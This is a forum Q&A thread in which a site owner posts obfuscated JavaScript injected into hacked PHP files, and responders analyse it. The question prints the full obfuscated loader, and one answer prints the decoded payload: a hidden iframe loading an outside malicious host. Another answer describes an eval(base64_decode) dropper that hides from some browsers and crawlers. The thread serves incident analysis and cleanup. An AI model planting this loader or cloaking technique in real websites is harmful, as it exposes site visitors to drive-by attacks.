Site was just attacked and javascript was injected at the header, what does it mean?

Question

One of our websites was attacked recently where multiple php files were modified. This modification injected javascript at the top of the page but after base64 decoding all of it I came across the following and I have no clue how to proceed.

Does anyone have any experience in this stuff and is there anyway to figure out exactly what they were trying to achieve?

<script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f65f79f75f56f58f79f79f79f56f4f66f69f69f65f63f68f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f65f79f75f56f58f79f79f79f56f4f66f69f69f65f63f68f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;573!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>

Beautified:

i = 0;
try {
    avasv = prototype;
} catch (z) {
    h = "harCode";
    f = ['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f65f79f75f56f58f79f79f79f56f4f66f69f69f65f63f68f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f65f79f75f56f58f79f79f79f56f4f66f69f69f65f63f68f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');
    v = "e" + "va";
}
if (v) e = window[v + "l"];
try {
    q = document.createElement("div");
    q.appendChild(q + "");
} catch (qwg) {
    w = f;
    s = [];
}
r = String;
z = ((e) ? h : "");
for (; 573 != i; i += 1) {
    j = i;
    if (e) s = s + r["fromC" + ((e) ? z : 12)](w[j] * 1 + 42);
}
if (v && e && r && z && h && s && f && v) e(s);

Answer 1

I looked at this code, it's kinda crazy.

It starts with try{avasv = prototype;}, which obviously fails. Then it makes some variables.

f is an array of numbers (length 573). z is harCode. Towards the end, there's "fromC" + ((e) ? z : 12). This creates fromCharCode (String.fromCharCode), which is used with the array of numbers, f (after adding 42 to each number). This seems to create a string to be evaled.

It gets evaled like this:

v = "e" + "va";
if (v) e = window[v + "l"];

As you can see e is window['eval'], or simply eval.

So, if you replace:

if (v && e && r && z && h && s && f && v) e(s);

with:

if (v && e && r && z && h && s && f && v) console.log(s);

Then, you can see what the purpose of this code was. I did this, and here is what was output:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://kyubdyyyb.lookin.at/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://kyubdyyyb.lookin.at/?go=2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

I don't know what http://kyubdyyyb.lookin.at/?go=2 is, so I suggest you don't go there.

There seem to be a lot of redundant checks here (like (e) ? z : 12, e will never be false). Probably just to make the code more confusing.

Answer 2

I know this isn't a direct answer, but it looks like the achieved what they wanted to do. Inject arbitrary script that would run on your website, to do something malicious.

Googling for "avasv=prototype" essentially just lists a ton of infected sites, but the few non-malicious looking hits indicate that this is a script unpacker.

What they were trying to achieve isn't the important thing. They achieved it. They placed a malicious script in your web app, and from there, they can steal sensitive data from your server and your visitors, and thanks to XmlHttp, post it back to their own web servers. The important thing is how you're going to clean it up before more of your visitors get compromised, and how you're going to code to prevent against XSS and XSRF in the future.

Hopefully, you've got source control, and can revert your site to a pre-infected state. That would be order of business #1.

If you haven't heard of it, I strongly recommend regular visits and learning at http://www.OWASP.org as an excellent way to learn how to prevent future occurrences.

---

One last note, even if your site has no sensitive data in it, you're still putting your customers at risk if they log into your site.

JavaScript can potentially be used to gather their username/password combination, which they can then use against other sites and potentially steal customer's information from those sites. (Depending on how your site is coded) So cleaning up and protecting your visitors is absolutely order of business #1 even if it means shutting down your site for "maintenance"

Finally, there's some good advice from Google in their article "My site's been hacked. Now what?"

Answer 3

I got this critter too and it was perplexing for a while, because grepping for identifying strings like avasv=prototype turned up some results but removing them didn't clean out the infection. To clarify the OP, it turns out it's originally injecting some more interesting PHP, usually in index.php files. You'll see a php eval(base64_decode(...)) in them on line 1.

What this code does, and I won't bother reposting because it's trivial, is decode and evaluate a base64 string containing some php. Inside that code is a basic UA-checker which looks for strings of uninfectable browser/OS combinations (mac, linux, google chrome browser, etc) and search spiders/bots. This is also why you won't see the malicious javascript if you try looking in certain browser/OS combos or use curl/wget. If it doesn't find one of its listed UA strings it then decodes and echoes the script seen in the OP, which is also base64 encoded.

So what you want to do to root it out is grep for "eval(base64_decode(". There's no legitimate purpose for that particular combination of functions that I can think of, so you should be able to track it down pretty quick and wipe it out. That won't fix whatever your original point of infection was of course.